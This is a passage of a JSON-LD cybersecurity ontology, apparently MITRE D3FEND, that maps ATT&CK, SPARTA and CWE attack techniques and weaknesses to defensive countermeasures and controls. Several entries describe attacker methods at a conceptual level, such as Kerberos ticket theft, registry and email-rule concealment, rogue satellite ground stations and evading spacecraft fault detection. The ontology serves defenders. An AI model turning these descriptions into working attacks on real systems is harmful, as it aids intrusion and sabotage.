        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:DS0038",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Information obtained (commonly through registration or activity logs) regarding one or more IP addresses registered with human readable names (ex: mitre.org)",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts.",
      "rdfs:label": "Domain Name (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1558.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1558.005",
      "d3f:definition": "Adversaries may attempt to steal Kerberos tickets stored in credential cache files (or ccache). These files are used for short term storage of a user's active session credentials. The ccache file is created upon user authentication and allows for access to multiple services without the user having to re-enter credentials.",
      "rdfs:label": "Ccache Files",
      "rdfs:subClassOf": {
        "@id": "d3f:T1558"
      }
    },
    {
      "@id": "d3f:EX-0018.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0018.01",
      "d3f:definition": "An EMP delivers a broadband, high-amplitude electromagnetic transient that couples into spacecraft electronics and harnesses, upsetting or damaging components over wide areas. In space, the archetype is a high-altitude nuclear event whose prompt fields induce immediate upsets and whose secondary radiation environment elevates dose and charging for an extended period along affected orbits. Consequences include widespread single-event effects, latch-ups, permanent degradation of sensitive devices, and accelerated aging of solar arrays and materials. The effect envelope is large and largely indiscriminate: multiple satellites within view can experience simultaneous anomalies consistent with intense electromagnetic stress and enhanced radiation.",
      "rdfs:label": "Electromagnetic Pulse (EMP) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0018/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0018"
      },
      "skos:prefLabel": "Electromagnetic Pulse (EMP)"
    },
    {
      "@id": "d3f:BooleanExpressionMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BEM",
      "d3f:definition": "Boolean expression matching produces a Boolean truth value for a given boolean expression and assignment of values to variables in the expression.",
      "d3f:kb-article": "## How it works\nA Boolean expression is an expression used in programming languages that produces a Boolean value when evaluated. A Boolean value is either true or false. A Boolean expression may be composed of a combination of the Boolean constants true or false, Boolean-typed variables, Boolean-valued operators, and Boolean-valued functions.\n\nBoolean expressions correspond to propositional formulas in logic and are a special case of Boolean circuits.\n\n## References\n1. Boolean expression. (2022, April 25). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Boolean_expression)\n2. Boolean algebra. (2022, May 19). In _Wikipedia_.\n[Link](https://en.wikipedia.org/wiki/Boolean_expression)",
      "rdfs:label": "Boolean Expression Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicalRules"
      }
    },
    {
      "@id": "d3f:T1183",
      "@type": "owl:Class",
      "d3f:attack-id": "T1183",
      "d3f:definition": "Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\\dbg\\ntsd.exe -g  notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.012",
      "rdfs:label": "Image File Execution Options Injection",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.012"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:Reference-ContainerImageAnalysis",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/0/CTR_Kubernetes_Hardening_Guidance_1.1_20220315.PDF"
      },
      "d3f:kb-abstract": "Container Images can contain unneeded, unsecured or insecure files.\n        By analyzing the container image, we can identify whether it respects\n        a specific set of predefined policies.",
      "d3f:kb-author": "National Security Agency",
      "d3f:kb-reference-of": {
        "@id": "d3f:ContainerImageAnalysis"
      },
      "d3f:kb-reference-title": "Kubernetes Hardening Guide",
      "rdfs:label": "Reference - Container Image Analysis"
    },
    {
      "@id": "d3f:ClusterAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CA",
      "d3f:definition": "Cluster analysis or clustering is the task of grouping a set of objects in such a way that objects in the same group (called a cluster) are more similar (in some sense) to each other than to those in other groups (clusters).",
      "d3f:kb-article": "## References\nCluster analysis. (n.d.). Wikipedia. [Link](https://en.wikipedia.org/wiki/Cluster_analysis)",
      "rdfs:label": "Cluster Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:UnsupervisedLearning"
      }
    },
    {
      "@id": "d3f:T0855",
      "@type": "owl:Class",
      "d3f:attack-id": "T0855",
      "d3f:definition": "Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)",
      "rdfs:label": "Unauthorized Command Message - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpairProcessControlTechnique"
      },
      "skos:prefLabel": "Unauthorized Command Message"
    },
    {
      "@id": "d3f:CWE-149",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-149",
      "d3f:definition": "Quotes injected into a product can be used to compromise a system. As data are parsed, an injected/absent/duplicate/malformed use of quotes may cause the process to take unexpected actions.",
      "rdfs:label": "Improper Neutralization of Quoting Syntax",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:ServiceDependency",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A service dependency indicates a service has an activity, agent, or another service which relies on it in order to be functional.",
      "rdfs:label": "Service Dependency",
      "rdfs:subClassOf": {
        "@id": "d3f:Dependency"
      }
    },
    {
      "@id": "d3f:M1032",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "rdfs:label": "Multi-factor Authentication"
    },
    {
      "@id": "d3f:FileDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is permanently removed from the file system or storage medium, potentially triggering actions related to data retention or recovery.",
      "rdfs:label": "File Deletion Event",
      "rdfs:subClassOf": {
        "@id": "d3f:FileEvent"
      }
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACEPOKETEXT",
      "@type": "owl:Class",
      "d3f:definition": "Copy the word data to the address addr in the tracee's memory.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_POKETEXT",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIWriteMemory"
      }
    },
    {
      "@id": "d3f:IA-0008.01",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0008.01",
      "d3f:definition": "Adversaries may field their own ground system, transportable or fixed, to transmit and receive mission-compatible signals. A typical setup couples steerable apertures and GPS-disciplined timing with SDR/modems configured for the target’s bands, modulation/coding, framing, and beacon structure. Using pass schedules and Doppler/polarization predictions, the actor crafts over-the-air traffic that appears valid at the RF and protocol layers.",
      "rdfs:label": "Rogue Ground Station - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0008/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0008"
      },
      "skos:prefLabel": "Rogue Ground Station"
    },
    {
      "@id": "d3f:CWE-1329",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1329",
      "d3f:definition": "The product contains a component that cannot be updated or patched in order to remove vulnerabilities or significant bugs.",
      "rdfs:label": "Reliance on Component That is Not Updateable",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1357"
        },
        {
          "@id": "d3f:CWE-664"
        }
      ]
    },
    {
      "@id": "d3f:DimensionReduction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DR",
      "d3f:definition": "Dimensionality reduction is a key technique within unsupervised learning. It compresses the data by finding a smaller, different set of variables that capture what matters most in the original features, while minimizing the loss of information.",
      "d3f:kb-article": "## References\nO'Reilly Media. (n.d.). Chapter 7. Machine Learning and Security: Protecting Systems with Data and Algorithms. [Link](https://www.oreilly.com/library/view/machine-learning-and/9781492073048/ch07.html)",
      "rdfs:label": "Dimension Reduction",
      "rdfs:subClassOf": {
        "@id": "d3f:UnsupervisedLearning"
      }
    },
    {
      "@id": "d3f:REC-0001.09",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.09",
      "d3f:definition": "Fault management (FDIR/autonomy/safing) materials are a prime reconnaissance target because they encode how the spacecraft detects, classifies, and responds to off-nominal states. Adversaries seek trigger thresholds and persistence timers, voting logic, inhibit and recovery ladders, safe-mode entry/exit criteria, command authority in safed states, watchdog/reset behavior, and any differences between flight and maintenance builds. Artifacts include fault trees, FMEAs, autonomy rule tables, safing flowcharts, and anomaly response playbooks. With these, a threat actor can craft inputs that remain just below detection thresholds, stack benign-looking events to cross safing boundaries at tactically chosen times, or exploit recovery windows when authentication, visibility, or redundancy is reduced. Knowledge of what telemetry is suppressed or rate-limited during safing further aids concealment.",
      "rdfs:label": "Fault Management - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/09/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Fault Management"
    },
    {
      "@id": "d3f:CCI-002384_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents unauthorized information transfer via shared resources in accordance with organization-defined procedures when system processing explicitly switches between different information classification levels or security categories.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:NetworkTrafficFiltering"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002384"
    },
    {
      "@id": "d3f:AML.T0048.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0048.001",
      "d3f:definition": "Reputational harm involves a degradation of public perception and trust in organizations.  Examples of reputation-harming incidents include scandals or false impersonations.",
      "rdfs:label": "Reputational Harm - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0048.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0048"
      },
      "skos:prefLabel": "Reputational Harm"
    },
    {
      "@id": "d3f:T1098.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1098.007",
      "d3f:definition": "An adversary may add additional local or domain groups to an adversary-controlled account to maintain persistent access to a system or domain.",
      "rdfs:label": "Additional Local or Domain Groups",
      "rdfs:subClassOf": {
        "@id": "d3f:T1098"
      }
    },
    {
      "@id": "d3f:WindowsNtOpenFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The NtOpenFile routine opens an existing file, directory, device, or volume.",
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntopenfile"
      },
      "rdfs:label": "Windows NtOpenFile",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIOpenFile"
      }
    },
    {
      "@id": "d3f:Reference-Windows-Management-Infrastructure",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wmi_v2/windows-management-infrastructure"
      },
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ConfigurationInventory"
        },
        {
          "@id": "d3f:HardwareComponentInventory"
        },
        {
          "@id": "d3f:NetworkNodeInventory"
        },
        {
          "@id": "d3f:SoftwareInventory"
        }
      ],
      "d3f:kb-reference-title": "Windows Management Infrastructure",
      "rdfs:label": "Reference - Windows Management Infrastructure (MI)"
    },
    {
      "@id": "d3f:T1137",
      "@type": "owl:Class",
      "d3f:attack-id": "T1137",
      "d3f:definition": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.",
      "rdfs:label": "Office Application Startup",
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:CWE-508",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-508",
      "d3f:definition": "Non-replicating malicious code only resides on the target system or product that is attacked; it does not attempt to spread to other systems.",
      "rdfs:label": "Non-Replicating Malicious Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-507"
      }
    },
    {
      "@id": "d3f:T1186",
      "@type": "owl:Class",
      "d3f:attack-id": "T1186",
      "d3f:definition": "Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1055.013",
      "rdfs:label": "Process Doppelgänging",
      "rdfs:seeAlso": {
        "@id": "d3f:T1055.013"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:DomainLogicValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DomainLogicValidation"
      ],
      "d3f:d3fend-id": "D3-DLV",
      "d3f:definition": "Validation of variable state in the context of the domain application.",
      "d3f:kb-article": "## How it works\nValidates the type, value, and/or range of an variable taking into context the current application in the business domain.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecurePLCCodingPracticesTop20List"
      },
      "d3f:validates": {
        "@id": "d3f:Subroutine"
      },
      "rdfs:label": "Domain Logic Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SourceCodeHardening"
        },
        {
          "@id": "_:Nea9eb574f3394ed495a9f5a6277a1b5d"
        }
      ]
    },
    {
      "@id": "_:Nea9eb574f3394ed495a9f5a6277a1b5d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:validates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:HTTPPostEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the HTTP POST method is used to submit data to the specified resource, often causing a change in state or side effects on the server.",
      "rdfs:label": "HTTP POST Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:CWE-839",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-839",
      "d3f:definition": "The product checks a value to ensure that it is less than or equal to a maximum, but it does not also verify that the value is greater than or equal to the minimum.",
      "d3f:synonym": "Signed comparison",
      "rdfs:label": "Numeric Range Comparison Without Minimum Check",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1023"
      }
    },
    {
      "@id": "d3f:ExecutableBinary",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:ImageCodeSegment"
        },
        {
          "@id": "d3f:ImageDataSegment"
        }
      ],
      "d3f:definition": "An executable binary contains machine code instructions for a physical CPU. D3FEND also considers byte code for a virtual machine to be binary code.  This is in contrast to executable scripts written in a scripting language.",
      "d3f:may-interpret": {
        "@id": "d3f:ExecutableScript"
      },
      "rdfs:label": "Executable Binary",
      "rdfs:seeAlso": {
        "@id": "dbr:Executable"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutableFile"
        },
        {
          "@id": "_:Nea1d1b22a015433cbd3f2281c90e54c2"
        },
        {
          "@id": "_:N95c0c2f469cb4f52b02a087905fb3bfb"
        },
        {
          "@id": "_:N547174a4af6d49f4a5e5f8eaf5fbe029"
        }
      ]
    },
    {
      "@id": "_:Nea1d1b22a015433cbd3f2281c90e54c2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ImageCodeSegment"
      }
    },
    {
      "@id": "_:N95c0c2f469cb4f52b02a087905fb3bfb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ImageDataSegment"
      }
    },
    {
      "@id": "_:N547174a4af6d49f4a5e5f8eaf5fbe029",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-interpret"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "d3f:DatabaseQueryStringAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DatabaseQueryStringAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:DatabaseQuery"
      },
      "d3f:d3fend-id": "D3-DQSA",
      "d3f:definition": "Analyzing database queries to detect [SQL Injection](https://capec.mitre.org/data/definitions/66.html).",
      "d3f:kb-article": "## How it works\n\nSome implementations use software hooks to intercept function calls related to database query operations. Other implementations might intercept or collect network traffic. The database query string is then extracted and analyzed with various methods, for example:\n* Detecting specific administrative SQL commands\n* Anomalous sequences of commands when compared to a statistical baseline.\n* Anomalous commands for a given user role.\n\n## Considerations\n\nSome capabilities sanitize queries before permitting them to be transmitted to the database. This incurs risks such altering data in an undesired way or breaking application functionality.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemAndMethodForInternetSecurity_CylanceInc"
      },
      "rdfs:label": "Database Query String Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "_:Ncb461d6b57584e358e024021fc69baad"
        }
      ]
    },
    {
      "@id": "_:Ncb461d6b57584e358e024021fc69baad",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseQuery"
      }
    },
    {
      "@id": "d3f:TA0041",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Execution - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:CCI-001242_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DynamicAnalysis"
        },
        {
          "@id": "d3f:EmulatedFileAnalysis"
        },
        {
          "@id": "d3f:FileContentRules"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization configures malicious code protection mechanisms to perform real-time scans of files from external sources at endpoints as the files are downloaded, opened, or executed in accordance with organizational security policy.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001242"
    },
    {
      "@id": "d3f:T1505.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1505.001",
      "d3f:creates": {
        "@id": "d3f:StoredProcedure"
      },
      "d3f:definition": "Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "SQL Stored Procedures",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1505"
        },
        {
          "@id": "_:Ne0275fd6bac643f29e346a705125314a"
        },
        {
          "@id": "_:N3ab011fbc4a0402e99057e2e2ae21a5a"
        }
      ]
    },
    {
      "@id": "_:Ne0275fd6bac643f29e346a705125314a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StoredProcedure"
      }
    },
    {
      "@id": "_:N3ab011fbc4a0402e99057e2e2ae21a5a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:ReferenceNullification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-RN",
      "d3f:definition": "Invalidating all pointers that reference a specific memory block, ensuring that the block cannot be accessed or modified after deallocation.",
      "d3f:hardens": {
        "@id": "d3f:MemoryFreeFunction"
      },
      "d3f:kb-article": "## How it Works\nNullifying references to memory blocks makes those blocks no longer accessible. This is critical to prevent use-after-free errors.\n\n## Considerations\n* If a memory block is freed, all other references to that block should be nullified.\n* This is particularly relevant when manually managing memory.\n* Note: This resource should not be considered a definitive or exhaustive coding guideline.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ReferenceNullification_SecureSoftwareInc"
      },
      "rdfs:label": "Reference Nullification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SourceCodeHardening"
        },
        {
          "@id": "_:Na9828da9f6fa496f9a9425398a85d9dc"
        }
      ]
    },
    {
      "@id": "_:Na9828da9f6fa496f9a9425398a85d9dc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryFreeFunction"
      }
    },
    {
      "@id": "d3f:MemoryPool",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:MemoryBlock"
      },
      "d3f:definition": "Memory pools, also called fixed-size blocks allocation, is the use of pools for memory management… preallocating a number of memory blocks with the same size called the memory pool. The application can allocate, access, and free blocks represented by handles at run time.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Memory_pool"
      },
      "rdfs:label": "Memory Pool",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MemoryExtent"
        },
        {
          "@id": "_:Nf52e94a79efd419fa3e649ed84c2c580"
        }
      ]
    },
    {
      "@id": "_:Nf52e94a79efd419fa3e649ed84c2c580",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "d3f:T1564.008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.008",
      "d3f:definition": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)",
      "d3f:may-create": {
        "@id": "d3f:EmailRule"
      },
      "d3f:may-modify": {
        "@id": "d3f:EmailRule"
      },
      "d3f:modifies": {
        "@id": "d3f:ApplicationConfiguration"
      },
      "rdfs:label": "Email Hiding Rules",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:N14cf88cd426d454683e33345395d09b9"
        },
        {
          "@id": "_:Na67dad56544e4655a1a708ab5010006d"
        },
        {
          "@id": "_:N394ba9b303074cafae6917b0c957ac58"
        }
      ]
    },
    {
      "@id": "_:N14cf88cd426d454683e33345395d09b9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EmailRule"
      }
    },
    {
      "@id": "_:Na67dad56544e4655a1a708ab5010006d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EmailRule"
      }
    },
    {
      "@id": "_:N394ba9b303074cafae6917b0c957ac58",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "d3f:BayesOptimalClassifier",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BOC",
      "d3f:definition": "A probabilistic model that makes the most probable prediction for a new example.",
      "d3f:kb-article": "## References\nBayes Optimal Classifier. Machine Learning Mastery.  [Link](https://machinelearningmastery.com/bayes-optimal-classifier/).\nEnsemble learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Ensemble_learning).",
      "rdfs:label": "Bayes Optimal Classifier",
      "rdfs:subClassOf": {
        "@id": "d3f:EnsembleLearning"
      }
    },
    {
      "@id": "d3f:CWE-339",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-339",
      "d3f:definition": "A Pseudo-Random Number Generator (PRNG) uses a relatively small seed space, which makes it more susceptible to brute force attacks.",
      "rdfs:label": "Small Seed Space in PRNG",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-335"
      }
    },
    {
      "@id": "d3f:ATTACKICSExecutionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0104"
      },
      "rdfs:label": "Execution Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:Nea572839c0fb44d78eb8316e229d786b"
        }
      ],
      "skos:prefLabel": "Execution Technique"
    },
    {
      "@id": "_:Nea572839c0fb44d78eb8316e229d786b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0104"
      }
    },
    {
      "@id": "d3f:CCI-002207_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uniquely identifies and authenticates destination by organization, system, application, and/or individual for information transfer.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002207"
    },
    {
      "@id": "d3f:T1112",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1112",
      "d3f:definition": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.",
      "d3f:modifies": {
        "@id": "d3f:WindowsRegistry"
      },
      "rdfs:label": "Modify Registry",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:N909dbb50d90d4b889254115686658a85"
        }
      ]
    },
    {
      "@id": "_:N909dbb50d90d4b889254115686658a85",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistry"
      }
    },
    {
      "@id": "d3f:M1035",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:NetworkIsolation"
      },
      "rdfs:label": "Limit Access to Resource Over Network"
    },
    {
      "@id": "d3f:CWE-1285",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1285",
      "d3f:definition": "The product receives input that is expected to specify an index, position, or offset into an indexable resource such as a buffer or file, but it does not validate or incorrectly validates that the specified index/position/offset has the required properties.",
      "rdfs:label": "Improper Validation of Specified Index, Position, or Offset in Input",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-20"
      }
    },
    {
      "@id": "d3f:Reference-SynchronizingAHoneyNetworkConfigurationToReflectATargetNetworkEnvironment_PaloAltoNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170019425A1"
      },
